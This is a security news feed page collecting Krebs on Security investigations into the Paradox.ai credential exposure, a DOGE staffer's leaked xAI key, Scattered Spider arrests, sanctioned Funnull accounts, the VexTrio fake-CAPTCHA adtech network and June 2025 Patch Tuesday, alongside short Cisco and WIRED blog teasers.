FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ ☆ ✇ Krebs on Security

Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai

By: BrianKrebs — July 18th 2025 at 01:23

Security researchers recently revealed that the personal information of millions of people who applied for jobs at McDonald’s was exposed after they guessed the password (“123456”) for the fast food chain’s account at Paradox.ai, a company that makes artificial intelligence based hiring chatbots used by many Fortune 500 firms. Paradox.ai said the security oversight was an isolated incident that did not affect its other customers, but recent security breaches involving its employees in Vietnam tell a more nuanced story.

A screenshot of the paradox.ai homepage showing its AI hiring chatbot “Olivia” interacting with potential hires.

Earlier this month, security researchers Ian Carroll and Sam Curry wrote about simple methods they found to access the backend of the AI chatbot platform on McHire.com, the McDonald’s website that many of its franchisees use to screen job applicants. As first reported by Wired, the researchers discovered that the weak password used by Paradox exposed 64 million records, including applicants’ names, email addresses and phone numbers.

Paradox.ai acknowledged the researchers’ findings but said the company’s other client instances were not affected, and that no sensitive information — such as Social Security numbers — was exposed.

“We are confident, based on our records, this test account was not accessed by any third party other than the security researchers,” the company wrote in a July 9 blog post. “It had not been logged into since 2019 and frankly, should have been decommissioned. We want to be very clear that while the researchers may have briefly had access to the system containing all chat interactions (NOT job applications), they only viewed and downloaded five chats in total that had candidate information within. Again, at no point was any data leaked online or made public.”

However, a review of stolen password data gathered by multiple breach-tracking services shows that at the end of June 2025, a Paradox.ai administrator in Vietnam suffered a malware compromise on their device that stole usernames and passwords for a variety of internal and third-party online services. The results were not pretty.

The password data from the Paradox.ai developer was stolen by a malware strain known as “Nexus Stealer,” a form grabber and password stealer that is sold on cybercrime forums. The information snarfed by stealers like Nexus is often recovered and indexed by data leak aggregator services like Intelligence X, which reports that the malware on the Paradox.ai developer’s device exposed hundreds of mostly poor and recycled passwords (using the same base password but slightly different characters at the end).

Those purloined credentials show the developer in question at one point used the same seven-digit password to log in to Paradox.ai accounts for a number of Fortune 500 firms listed as customers on the company’s website, including Aramark, Lockheed Martin, Lowes, and Pepsi.

Seven-character passwords, particularly those consisting entirely of numerals, are highly vulnerable to “brute-force” attacks that can try a large number of possible password combinations in quick succession. According to a much-referenced password strength guide maintained by Hive Systems, modern password-cracking systems can work out a seven number password more or less instantly.

Image: hivesystems.com.

In response to questions from KrebsOnSecurity, Paradox.ai confirmed that the password data was recently stolen by a malware infection on the personal device of a longtime Paradox developer based in Vietnam, and said the company was made aware of the compromise shortly after it happened. Paradox maintains that few of the exposed passwords were still valid, and that a majority of them were present on the employee’s personal device only because he had migrated the contents of a password manager from an old computer.

Paradox also pointed out that it has been requiring single sign-on (SSO) authentication since 2020 that enforces multi-factor authentication for its partners. Still, a review of the exposed passwords shows they included the Vietnamese administrator’s credentials to the company’s SSO platform — paradoxai.okta.com. The password for that account ended in 202506 — possibly a reference to the month of June 2025 — and the digital cookie left behind after a successful Okta login with those credentials says it was valid until December 2025.

Also exposed were the administrator’s credentials and authentication cookies for an account at Atlassian, a platform made for software development and project management. The expiration date for that authentication token likewise was December 2025.

Infostealer infections are among the leading causes of data breaches and ransomware attacks today, and they result in the theft of stored passwords and any credentials the victim types into a browser. Most infostealer malware also will siphon authentication cookies stored on the victim’s device, and depending on how those tokens are configured thieves may be able to use them to bypass login prompts and/or multi-factor authentication.

Quite often these infostealer infections will open a backdoor on the victim’s device that allows attackers to access the infected machine remotely. Indeed, it appears that remote access to the Paradox administrator’s compromised device was offered for sale recently.

In February 2019, Paradox.ai announced it had successfully completed audits for two fairly comprehensive security standards (ISO 27001 and SOC 2 Type II). Meanwhile, the company’s security disclosure this month says the test account with the atrocious 123456 username and password was last accessed in 2019, but somehow missed in their annual penetration tests. So how did it manage to pass such stringent security audits with these practices in place?

Paradox.ai told KrebsOnSecurity that at the time of the 2019 audit, the company’s various contractors were not held to the same security standards the company practices internally. Paradox emphasized that this has changed, and that it has updated its security and password requirements multiple times since then.

It is unclear how the Paradox developer in Vietnam infected his computer with malware, but a closer review finds a Windows device for another Paradox.ai employee from Vietnam was compromised by similar data-stealing malware at the end of 2024 (that compromise included the victim’s GitHub credentials). In the case of both employees, the stolen credential data includes Web browser logs that indicate the victims repeatedly downloaded pirated movies and television shows, which are often bundled with malware disguised as a video codec needed to view the pirated content.

☐ ☆ ✇ Krebs on Security

DOGE Denizen Marko Elez Leaked API Key for xAI

By: BrianKrebs — July 15th 2025 at 01:23

Marko Elez, a 25-year-old employee at Elon Musk’s Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk’s artificial intelligence company xAI.

Image: Shutterstock, @sdx15.

On July 13, Mr. Elez committed a code script to GitHub called “agent.py” that included a private application programming interface (API) key for xAI. The inclusion of the private key was first flagged by GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, said the exposed API key allowed access to at least 52 different LLMs used by xAI. The most recent LLM in the list was called “grok-4-0709” and was created on July 9, 2025.

Grok, the generative AI chatbot developed by xAI and integrated into Twitter/X, relies on these and other LLMs (a query to Grok before publication shows Grok currently uses Grok-3, which was launched in Feburary 2025). Earlier today, xAI announced that the Department of Defense will begin using Grok as part of a contract worth up to $200 million. The contract award came less than a week after Grok began spewing antisemitic rants and invoking Adolf Hitler.

Mr. Elez did not respond to a request for comment. The code repository containing the private xAI key was removed shortly after Caturegli notified Elez via email. However, Caturegli said the exposed API key still works and has not yet been revoked.

“If a developer can’t keep an API key private, it raises questions about how they’re handling far more sensitive government information behind closed doors,” Caturegli told KrebsOnSecurity.

Prior to joining DOGE, Marko Elez worked for a number of Musk’s companies. His DOGE career began at the Department of the Treasury, and a legal battle over DOGE’s access to Treasury databases showed Elez was sending unencrypted personal information in violation of the agency’s policies.

While still at Treasury, Elez resigned after The Wall Street Journal linked him to social media posts that advocated racism and eugenics. When Vice President J.D. Vance lobbied for Elez to be rehired, President Trump agreed and Musk reinstated him.

Since his re-hiring as a DOGE employee, Elez has been granted access to databases at one federal agency after another. TechCrunch reported in February 2025 that he was working at the Social Security Administration. In March, Business Insider found Elez was part of a DOGE detachment assigned to the Department of Labor.

Marko Elez, in a photo from a social media profile.

In April, The New York Times reported that Elez held positions at the U.S. Customs and Border Protection and the Immigration and Customs Enforcement (ICE) bureaus, as well as the Department of Homeland Security. The Washington Post later reported that Elez, while serving as a DOGE advisor at the Department of Justice, had gained access to the Executive Office for Immigration Review’s Courts and Appeals System (EACS).

Elez is not the first DOGE worker to publish internal API keys for xAI: In May, KrebsOnSecurity detailed how another DOGE employee leaked a private xAI key on GitHub for two months, exposing LLMs that were custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X.

Caturegli said it’s difficult to trust someone with access to confidential government systems when they can’t even manage the basics of operational security.

“One leak is a mistake,” he said. “But when the same type of sensitive key gets exposed again and again, it’s not just bad luck, it’s a sign of deeper negligence and a broken security culture.”

☐ ☆ ✇ Krebs on Security

UK Arrests Four in ‘Scattered Spider’ Ransom Group

By: BrianKrebs — July 10th 2025 at 17:31

Authorities in the United Kingdom this week arrested four people aged 17 to 20 in connection with recent data theft and extortion attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. The breaches have been linked to a prolific but loosely-affiliated cybercrime group dubbed “Scattered Spider,” whose other recent victims include multiple airlines.

The U.K.’s National Crime Agency (NCA) declined verify the names of those arrested, saying only that they included two males aged 19, another aged 17, and 20-year-old female.

Scattered Spider is the name given to an English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access. The FBI warned last month that Scattered Spider had recently shifted to targeting companies in the retail and airline sectors.

KrebsOnSecurity has learned the identities of two of the suspects. Multiple sources close to the investigation said those arrested include Owen David Flowers, a U.K. man alleged to have been involved in the cyber intrusion and ransomware attack that shut down several MGM Casino properties in September 2023. Those same sources said the woman arrested is or recently was in a relationship with Flowers.

Sources told KrebsOnSecurity that Flowers, who allegedly went by the hacker handles “bo764,” “Holy,” and “Nazi,” was the group member who anonymously gave interviews to the media in the days after the MGM hack. His real name was omitted from a September 2024 story about the group because he was not yet charged in that incident.

The bigger fish arrested this week is 19-year-old Thalha Jubair, a U.K. man whose alleged exploits under various monikers have been well-documented in stories on this site. Jubair is believed to have used the nickname “Earth2Star,” which corresponds to a founding member of the cybercrime-focused Telegram channel “Star Fraud Chat.”

In 2023, KrebsOnSecurity published an investigation into the work of three different SIM-swapping groups that phished credentials from T-Mobile employees and used that access to offer a service whereby any T-Mobile phone number could be swapped to a new device. Star Chat was by far the most active and consequential of the three SIM-swapping groups, who collectively broke into T-Mobile’s network more than 100 times in the second half of 2022.

Jubair allegedly used the handles “Earth2Star” and “Star Ace,” and was a core member of a prolific SIM-swapping group operating in 2022. Star Ace posted this image to the Star Fraud chat channel on Telegram, and it lists various prices for SIM-swaps.

Sources tell KrebsOnSecurity that Jubair also was a core member of the LAPSUS$ cybercrime group that broke into dozens of technology companies in 2022, stealing source code and other internal data from tech giants including Microsoft, Nvidia, Okta, Rockstar Games, Samsung, T-Mobile, and Uber.

In April 2022, KrebsOnSecurity published internal chat records from LAPSUS$, and those chats indicated Jubair was using the nicknames Amtrak and Asyntax. At one point in the chats, Amtrak told the LAPSUS$ group leader not to share T-Mobile’s logo in images sent to the group because he’d been previously busted for SIM-swapping and his parents would suspect he was back at it again.

As shown in those chats, the leader of LAPSUS$ eventually decided to betray Amtrak by posting his real name, phone number, and other hacker handles into a public chat room on Telegram.

In March 2022, the leader of the LAPSUS$ data extortion group exposed Thalha Jubair’s name and hacker handles in a public chat room on Telegram.

That story about the leaked LAPSUS$ chats connected Amtrak/Asyntax/Jubair to the identity “Everlynn,” the founder of a cybercriminal service that sold fraudulent “emergency data requests” targeting the major social media and email providers. In such schemes, the hackers compromise email accounts tied to police departments and government agencies, and then send unauthorized demands for subscriber data while claiming the information being requested can’t wait for a court order because it relates to an urgent matter of life and death.

The roster of the now-defunct “Infinity Recursion” hacking team, from which some member of LAPSUS$ hail.

Sources say Jubair also used the nickname “Operator,” and that until recently he was the administrator of the Doxbin, a long-running and highly toxic online community that is used to “dox” or post deeply personal information on people. In May 2024, several popular cybercrime channels on Telegram ridiculed Operator after it was revealed that he’d staged his own kidnapping in a botched plan to throw off law enforcement investigators.

In November 2024, U.S. authorities charged five men aged 20 to 25 in connection with the Scattered Spider group, which has long relied on recruiting minors to carry out its most risky activities. Indeed, many of the group’s core members were recruited from online gaming platforms like Roblox and Minecraft in their early teens, and have been perfecting their social engineering tactics for years.

“There is a clear pattern that some of the most depraved threat actors first joined cybercrime gangs at an exceptionally young age,” said Allison Nixon, chief research officer at the New York based security firm Unit 221B. “Cybercriminals arrested at 15 or younger need serious intervention and monitoring to prevent a years long massive escalation.”

☐ ☆ ✇ Security – Cisco Blog

Cisco Catalyst 8300 Excels in NetSecOPEN NGFW SD-WAN Security Tests

By: Hugo Vliegen — July 10th 2025 at 12:00
Cisco Catalyst 8300 earns NetSecOPEN certification for exceptional real-world NGFW and SD-WAN performance under modern enterprise conditions.
☐ ☆ ✇ Krebs on Security

Big Tech’s Mixed Response to U.S. Treasury Sanctions

By: BrianKrebs — July 3rd 2025 at 16:06

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But a new report finds the accused continues to operate a slew of established accounts at American tech companies — including Facebook, Github, PayPal and Twitter/X.

On May 29, the U.S. Department of the Treasury announced economic sanctions against Funnull Technology Inc., a Philippines-based company alleged to provide infrastructure for hundreds of thousands of websites involved in virtual currency investment scams known as “pig butchering.” In January 2025, KrebsOnSecurity detailed how Funnull was designed as a content delivery network that catered to foreign cybercriminals seeking to route their traffic through U.S.-based cloud providers.

The Treasury also sanctioned Funnull’s alleged operator, a 40-year-old Chinese national named Liu “Steve” Lizhi. The government says Funnull directly facilitated financial schemes resulting in more than $200 million in financial losses by Americans, and that the company’s operations were linked to the majority of pig butchering scams reported to the FBI.

It is generally illegal for U.S. companies or individuals to transact with people sanctioned by the Treasury. However, as Mr. Lizhi’s case makes clear, just because someone is sanctioned doesn’t necessarily mean big tech companies are going to suspend their online accounts.

The government says Lizhi was born November 13, 1984, and used the nicknames “XXL4” and “Nice Lizhi.” Nevertheless, Steve Liu’s 17-year-old account on LinkedIn (in the name “Liulizhi”) had hundreds of followers (Lizhi’s LinkedIn profile helpfully confirms his birthday) until quite recently: The account was deleted this morning, just hours after KrebsOnSecurity sought comment from LinkedIn.

Mr. Lizhi’s LinkedIn account was suspended sometime in the last 24 hours, after KrebsOnSecurity sought comment from LinkedIn.

In an emailed response, a LinkedIn spokesperson said the company’s “Prohibited countries policy” states that LinkedIn “does not sell, license, support or otherwise make available its Premium accounts or other paid products and services to individuals and companies sanctioned by the U.S. government.” LinkedIn declined to say whether the profile in question was a premium or free account.

Mr. Lizhi also maintains a working PayPal account under the name Liu Lizhi and username “@nicelizhi,” another nickname listed in the Treasury sanctions. A 15-year-old Twitter/X account named “Lizhi” that links to Mr. Lizhi’s personal domain remains active, although it has few followers and hasn’t posted in years.

These accounts and many others were flagged by the security firm Silent Push, which has been tracking Funnull’s operations for the past year and calling out U.S. cloud providers like Amazon and Microsoft for failing to more quickly sever ties with the company.

Liu Lizhi’s PayPal account.

In a report released today, Silent Push found Lizhi still operates numerous Facebook accounts and groups, including a private Facebook account under the name Liu Lizhi. Another Facebook account clearly connected to Lizhi is a tourism page for Ganzhou, China called “EnjoyGanzhou” that was named in the Treasury Department sanctions.

“This guy is the technical administrator for the infrastructure that is hosting a majority of scams targeting people in the United States, and hundreds of millions have been lost based on the websites he’s been hosting,” said Zach Edwards, senior threat researcher at Silent Push. “It’s crazy that the vast majority of big tech companies haven’t done anything to cut ties with this guy.”

The FBI says it received nearly 150,000 complaints last year involving digital assets and $9.3 billion in losses — a 66 percent increase from the previous year. Investment scams were the top crypto-related crimes reported, with $5.8 billion in losses.

In a statement, a Meta spokesperson said the company continuously takes steps to meet its legal obligations, but that sanctions laws are complex and varied. They explained that sanctions are often targeted in nature and don’t always prohibit people from having a presence on its platform. Nevertheless, Meta confirmed it had removed the account, unpublished Pages, and removed Groups and events associated with the user for violating its policies.

Attempts to reach Mr. Lizhi via his primary email addresses at Hotmail and Gmail bounced as undeliverable. Likewise, his 14-year-old YouTube channel appears to have been taken down recently.

However, anyone interested in viewing or using Mr. Lizhi’s 146 computer code repositories will have no problem finding GitHub accounts for him, including one registered under the NiceLizhi and XXL4 nicknames mentioned in the Treasury sanctions.

One of multiple GitHub profiles used by Liu “Steve” Lizhi, who uses the nickname XXL4 (a moniker listed in the Treasury sanctions for Mr. Lizhi).

Mr. Lizhi also operates a GitHub page for an open source e-commerce platform called NexaMerchant, which advertises itself as a payment gateway working with numerous American financial institutions. Interestingly, this profile’s “followers” page shows several other accounts that appear to be Mr. Lizhi’s. All of the account’s followers are tagged as “suspended,” even though that suspended message does not display when one visits those individual profiles.

In response to questions, GitHub said it has a process in place to identify when users and customers are Specially Designated Nationals or other denied or blocked parties, but that it locks those accounts instead of removing them. According to its policy, GitHub takes care that users and customers aren’t impacted beyond what is required by law.

All of the follower accounts for the XXL4 GitHub account appear to be Mr. Lizhi’s, and have been suspended by GitHub, but their code is still accessible.

“This includes keeping public repositories, including those for open source projects, available and accessible to support personal communications involving developers in sanctioned regions,” the policy states. “This also means GitHub will advocate for developers in sanctioned regions to enjoy greater access to the platform and full access to the global open source community.”

Edwards said it’s great that GitHub has a process for handling sanctioned accounts, but that the process doesn’t seem to communicate risk in a transparent way, noting that the only indicator on the locked accounts is the message, “This repository has been archived by the owner. It is not read-only.”

“It’s an odd message that doesn’t communicate, ‘This is a sanctioned entity, don’t fork this code or use it in a production environment’,” Edwards said.

Mark Rasch is a former federal cybercrime prosecutor who now serves as counsel for the New York City based security consulting firm Unit 221B. Rasch said when Treasury’s Office of Foreign Assets Control (OFAC) sanctions a person or entity, it then becomes illegal for businesses or organizations to transact with the sanctioned party.

Rasch said financial institutions have very mature systems for severing accounts tied to people who become subject to OFAC sanctions, but that tech companies may be far less proactive — particularly with free accounts.

“Banks have established ways of checking [U.S. government sanctions lists] for sanctioned entities, but tech companies don’t necessarily do a good job with that, especially for services that you can just click and sign up for,” Rasch said. “It’s potentially a risk and liability for the tech companies involved, but only to the extent OFAC is willing to enforce it.”

Liu Lizhi operates numerous Facebook accounts and groups, including this one for an entity specified in the OFAC sanctions: The “Enjoy Ganzhou” tourism page for Ganzhou, China. Image: Silent Push.

In July 2024, Funnull purchased the domain polyfill[.]io, the longtime home of a legitimate open source project that allowed websites to ensure that devices using legacy browsers could still render content in newer formats. After the Polyfill domain changed hands, at least 384,000 websites were caught in a supply-chain attack that redirected visitors to malicious sites. According to the Treasury, Funnull used the code to redirect people to scam websites and online gambling sites, some of which were linked to Chinese criminal money laundering operations.

The U.S. government says Funnull provides domain names for websites on its purchased IP addresses, using domain generation algorithms (DGAs) — programs that generate large numbers of similar but unique names for websites — and that it sells web design templates to cybercriminals.

“These services not only make it easier for cybercriminals to impersonate trusted brands when creating scam websites, but also allow them to quickly change to different domain names and IP addresses when legitimate providers attempt to take the websites down,” reads a Treasury statement.

Meanwhile, Funnull appears to be morphing nearly all aspects of its business in the wake of the sanctions, Edwards said.

“Whereas before they might have used 60 DGA domains to hide and bounce their traffic, we’re seeing far more now,” he said. “They’re trying to make their infrastructure harder to track and more complicated, so for now they’re not going away but more just changing what they’re doing. And a lot more organizations should be holding their feet to the fire.”

Update, 2:48 PM ET: Added response from Meta, which confirmed it has closed the accounts and groups connected to Mr. Lizhi.

Update, July 7, 6:56 p.m. ET: In a written statement, PayPal said it continually works to combat and prevent the illicit use of its services.

“We devote significant resources globally to financial crime compliance, and we proactively refer cases to and assist law enforcement officials around the world in their efforts to identify, investigate and stop illegal activity,” the statement reads.

☐ ☆ ✇ Security – Cisco Blog

Cisco Live San Diego Case Study: Malware Upatre! (Encrypted Visibility Engine Event)

By: Aditya Sankar — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ Security – Cisco Blog

Splunk in Action at the Cisco Live San Diego SOC

By: Jessica (Bair) Oppenheimer — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ Security – Cisco Blog

Using AI to Battle Phishing Campaigns

By: Ryan Maclennan — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ Security – Cisco Blog

Building an XDR Integration With Splunk Attack Analyzer

By: Ryan Maclennan — July 2nd 2025 at 12:00
Cisco XDR is an infinitely extensible platform for security integrations. Like the maturing SOCs of our customers, the event SOC team at Cisco Live San Diego 2025 built custom integrations to meet our needs. You can build your own integrations using the community resources announced at Cisco Live. It was an honor to work with […]
☐ ☆ ✇ Security – Cisco Blog

Cisco Live San Diego Case Study: Hunting Cleartext Passwords in HTTP POST Requests

By: Aditya Sankar — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future. 
☐ ☆ ✇ Security – Cisco Blog

Secure Endpoint Enhancements Elevate Cisco XDR and Breach Protection Suite

By: Katie Webster — June 30th 2025 at 12:00
Discover how Secure Endpoint enhancements elevate Cisco XDR and the Breach Protection Suite with better visibility and advanced threat defense.
☐ ☆ ✇ WIRED

Minnesota Shooting Suspect Allegedly Used Data Broker Sites to Find Targets’ Addresses

By: Lily Hay Newman — June 17th 2025 at 02:24
The shooter allegedly researched several “people search” sites in an attempt to target his victims, highlighting the potential dangers of widely available personal data.
☐ ☆ ✇ Security – Cisco Blog

XDR still means so much more than some may realize

By: Briana Farro — June 16th 2025 at 12:00
Cisco has been named a Leader and Fast Mover in GigaOm's Radar for Extended Detection and Response (XDR). Learn what sets Cisco XDR apart in our blog.
☐ ☆ ✇ Krebs on Security

Inside a Dark Adtech Empire Fed by Fake CAPTCHAs

By: BrianKrebs — June 12th 2025 at 22:14

Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.

Image: Infoblox.

In November 2024, researchers at the security firm Qurium published an investigation into “Doppelganger,” a disinformation network that promotes pro-Russian narratives and infiltrates Europe’s media landscape by pushing fake news through a network of cloned websites.

Doppelganger campaigns use specialized links that bounce the visitor’s browser through a long series of domains before the fake news content is served. Qurium found Doppelganger relies on a sophisticated “domain cloaking” service, a technology that allows websites to present different content to search engines compared to what regular visitors see. The use of cloaking services helps the disinformation sites remain online longer than they otherwise would, while ensuring that only the targeted audience gets to view the intended content.

Qurium discovered that Doppelganger’s cloaking service also promoted online dating sites, and shared much of the same infrastructure with VexTrio, which is thought to be the oldest malicious traffic distribution system (TDS) in existence. While TDSs are commonly used by legitimate advertising networks to manage traffic from disparate sources and to track who or what is behind each click, VexTrio’s TDS largely manages web traffic from victims of phishing, malware, and social engineering scams.

BREAKING BAD

Digging deeper, Qurium noticed Doppelganger’s cloaking service used an Internet provider in Switzerland as the first entry point in a chain of domain redirections. They also noticed the same infrastructure hosted a pair of co-branded affiliate marketing services that were driving traffic to sketchy adult dating sites: LosPollos[.]com and TacoLoco[.]co.

The LosPollos ad network incorporates many elements and references from the hit series “Breaking Bad,” mirroring the fictional “Los Pollos Hermanos” restaurant chain that served as a money laundering operation for a violent methamphetamine cartel.

The LosPollos advertising network invokes characters and themes from the hit show Breaking Bad. The logo for LosPollos (upper left) is the image of Gustavo Fring, the fictional chicken restaurant chain owner in the show.

Affiliates who sign up with LosPollos are given JavaScript-heavy “smartlinks” that drive traffic into the VexTrio TDS, which in turn distributes the traffic among a variety of advertising partners, including dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams and malware download sites.

LosPollos affiliates typically stitch these smart links into WordPress websites that have been hacked via known vulnerabilities, and those affiliates will earn a small commission each time an Internet user referred by any of their hacked sites falls for one of these lures.

The Los Pollos advertising network promoting itself on LinkedIn.

According to Qurium, TacoLoco is a traffic monetization network that uses deceptive tactics to trick Internet users into enabling “push notifications,” a cross-platform browser standard that allows websites to show pop-up messages which appear outside of the browser. For example, on Microsoft Windows systems these notifications typically show up in the bottom right corner of the screen — just above the system clock.

In the case of VexTrio and TacoLoco, the notification approval requests themselves are deceptive — disguised as “CAPTCHA” challenges designed to distinguish automated bot traffic from real visitors. For years, VexTrio and its partners have successfully tricked countless users into enabling these site notifications, which are then used to continuously pepper the victim’s device with a variety of phony virus alerts and misleading pop-up messages.

Examples of VexTrio landing pages that lead users to accept push notifications on their device.

According to a December 2024 annual report from GoDaddy, nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks.

ADSPRO AND TEKNOLOGY

On November 14, 2024, Qurium published research to support its findings that LosPollos and TacoLoco were services operated by Adspro Group, a company registered in the Czech Republic and Russia, and that Adspro runs its infrastructure at the Swiss hosting providers C41 and Teknology SA.

Qurium noted the LosPollos and TacoLoco sites state that their content is copyrighted by ByteCore AG and SkyForge Digital AG, both Swiss firms that are run by the owner of Teknology SA, Giulio Vitorrio Leonardo Cerutti. Further investigation revealed LosPollos and TacoLoco were apps developed by a company called Holacode, which lists Cerutti as its CEO.

The apps marketed by Holacode include numerous VPN services, as well as one called Spamshield that claims to stop unwanted push notifications. But in January, Infoblox said they tested the app on their own mobile devices, and found it hides the user’s notifications, and then after 24 hours stops hiding them and demands payment. Spamshield subsequently changed its developer name from Holacode to ApLabz, although Infoblox noted that the Terms of Service for several of the rebranded ApLabz apps still referenced Holacode in their terms of service.

Incredibly, Cerutti threatened to sue me for defamation before I’d even uttered his name or sent him a request for comment (Cerutti sent the unsolicited legal threat back in January after his company and my name were merely tagged in an Infoblox post on LinkedIn about VexTrio).

Asked to comment on the findings by Qurium and Infoblox, Cerutti vehemently denied being associated with VexTrio. Cerutti asserted that his companies all strictly adhere to the regulations of the countries in which they operate, and that they have been completely transparent about all of their operations.

“We are a group operating in the advertising and marketing space, with an affiliate network program,” Cerutti responded. “I am not [going] to say we are perfect, but I strongly declare we have no connection with VexTrio at all.”

“Unfortunately, as a big player in this space we also get to deal with plenty of publisher fraud, sketchy traffic, fake clicks, bots, hacked, listed and resold publisher accounts, etc, etc.,” Cerutti continued. “We bleed lots of money to such malpractices and conduct regular internal screenings and audits in a constant battle to remove bad traffic sources. It is also a highly competitive space, where some upstarts will often play dirty against more established mainstream players like us.”

Working with Qurium, researchers at the security firm Infoblox released details about VexTrio’s infrastructure to their industry partners. Just four days after Qurium published its findings, LosPollos announced it was suspending its push monetization service. Less than a month later, Adspro had rebranded to Aimed Global.

A mind map illustrating some of the key findings and connections in the Infoblox and Qurium investigations. Click to enlarge.

A REVEALING PIVOT

In March 2025, researchers at GoDaddy chronicled how DollyWay — a malware strain that has consistently redirected victims to VexTrio throughout its eight years of activity — suddenly stopped doing that on November 20, 2024. Virtually overnight, DollyWay and several other malware families that had previously used VexTrio began pushing their traffic through another TDS called Help TDS.

Digging further into historical DNS records and the unique code scripts used by the Help TDS, Infoblox determined it has long enjoyed an exclusive relationship with VexTrio (at least until LosPollos ended its push monetization service in November).

In a report released today, Infoblox said an exhaustive analysis of the JavaScript code, website lures, smartlinks and DNS patterns used by VexTrio and Help TDS linked them with at least four other TDS operators (not counting TacoLoco). Those four entities — Partners House, BroPush, RichAds and RexPush — are all Russia-based push monetization programs that pay affiliates to drive signups for a variety of schemes, but mostly online dating services.

“As Los Pollos push monetization ended, we’ve seen an increase in fake CAPTCHAs that drive user acceptance of push notifications, particularly from Partners House,” the Infoblox report reads. “The relationship of these commercial entities remains a mystery; while they are certainly long-time partners redirecting traffic to one another, and they all have a Russian nexus, there is no overt common ownership.”

Renee Burton, vice president of threat intelligence at Infoblox, said the security industry generally treats the deceptive methods used by VexTrio and other malicious TDSs as a kind of legally grey area that is mostly associated with less dangerous security threats, such as adware and scareware.

But Burton argues that this view is myopic, and helps perpetuate a dark adtech industry that also pushes plenty of straight-up malware, noting that hundreds of thousands of compromised websites around the world every year redirect victims to the tangled web of VexTrio and VexTrio-affiliate TDSs.

“These TDSs are a nefarious threat, because they’re the ones you can connect to the delivery of things like information stealers and scams that cost consumers billions of dollars a year,” Burton said. “From a larger strategic perspective, my takeaway is that Russian organized crime has control of malicious adtech, and these are just some of the many groups involved.”

WHAT CAN YOU DO?

As KrebsOnSecurity warned way back in 2020, it’s a good idea to be very sparing in approving notifications when browsing the Web. In many cases these notifications are benign, but as we’ve seen there are numerous dodgy firms that are paying site owners to install their notification scripts, and then reselling that communications pathway to scammers and online hucksters.

If you’d like to prevent sites from ever presenting notification requests, all of the major browser makers let you do this — either across the board or on a per-website basis. While it is true that blocking notifications entirely can break the functionality of some websites, doing this for any devices you manage on behalf of your less tech-savvy friends or family members might end up saving everyone a lot of headache down the road.

To modify site notification settings in Mozilla Firefox, navigate to Settings, Privacy & Security, Permissions, and click the “Settings” tab next to “Notifications.” That page will display any notifications already permitted and allow you to edit or delete any entries. Tick the box next to “Block new requests asking to allow notifications” to stop them altogether.

In Google Chrome, click the icon with the three dots to the right of the address bar, scroll all the way down to Settings, Privacy and Security, Site Settings, and Notifications. Select the “Don’t allow sites to send notifications” button if you want to banish notification requests forever.

In Apple’s Safari browser, go to Settings, Websites, and click on Notifications in the sidebar. Uncheck the option to “allow websites to ask for permission to send notifications” if you wish to turn off notification requests entirely.

☐ ☆ ✇ Krebs on Security

Patch Tuesday, June 2025 Edition

By: BrianKrebs — June 11th 2025 at 00:10

Microsoft today released security updates to fix at least 67 vulnerabilities in its Windows operating systems and software. Redmond warns that one of the flaws is already under active attack, and that software blueprints showing how to exploit a pervasive Windows bug patched this month are now public.

The sole zero-day flaw this month is CVE-2025-33053, a remote code execution flaw in the Windows implementation of WebDAV — an HTTP extension that lets users remotely manage files and directories on a server. While WebDAV isn’t enabled by default in Windows, its presence in legacy or specialized systems still makes it a relevant target, said Seth Hoyt, senior security engineer at Automox.

Adam Barnett, lead software engineer at Rapid7, said Microsoft’s advisory for CVE-2025-33053 does not mention that the Windows implementation of WebDAV is listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default.

“The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control,” Barnett said. “Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2.”

Microsoft warns that an “elevation of privilege” vulnerability in the Windows Server Message Block (SMB) client (CVE-2025-33073) is likely to be exploited, given that proof-of-concept code for this bug is now public. CVE-2025-33073 has a CVSS risk score of 8.8 (out of 10), and exploitation of the flaw leads to the attacker gaining “SYSTEM” level control over a vulnerable PC.

“What makes this especially dangerous is that no further user interaction is required after the initial connection—something attackers can often trigger without the user realizing it,” said Alex Vovk, co-founder and CEO of Action1. “Given the high privilege level and ease of exploitation, this flaw poses a significant risk to Windows environments. The scope of affected systems is extensive, as SMB is a core Windows protocol used for file and printer sharing and inter-process communication.”

Beyond these highlights, 10 of the vulnerabilities fixed this month were rated “critical” by Microsoft, including eight remote code execution flaws.

